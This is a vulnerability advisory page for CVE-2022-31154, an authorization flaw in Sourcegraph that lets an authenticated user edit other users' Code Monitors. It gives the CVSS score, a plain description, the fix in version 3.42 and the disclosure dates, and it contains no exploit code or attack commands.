CVE-2022-31154 MEDIUM

CVE-2022-31154: Indirect Object Access in Sourcegraph Code Monitoring

Vendor Sourcegraph
Product sourcegraph
Weakness CWE-863 · Incorrect authorization
Published August 1, 2022
Last update April 23, 2025

CVSS base score

6.4/10
Attack vector Network
Attack complexity Low
Privileges required Low
User interaction None
Confidentiality None
Integrity Low

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L

What the vulnerability does

01Description

Sourcegraph is an opensource code search and navigation engine. It is possible for an authenticated Sourcegraph user to edit the Code Monitors owned by any other Sourcegraph user. This includes being able to edit both the trigger and the action of the monitor in question. An attacker is not able to read contents of existing code monitors, only override the data. The issue is fixed in Sourcegraph 3.42. There are no workaround for the issue and patching is highly recommended.

Key dates

02Disclosure timeline

August 1, 2022 CVE published
April 23, 2025 Record updated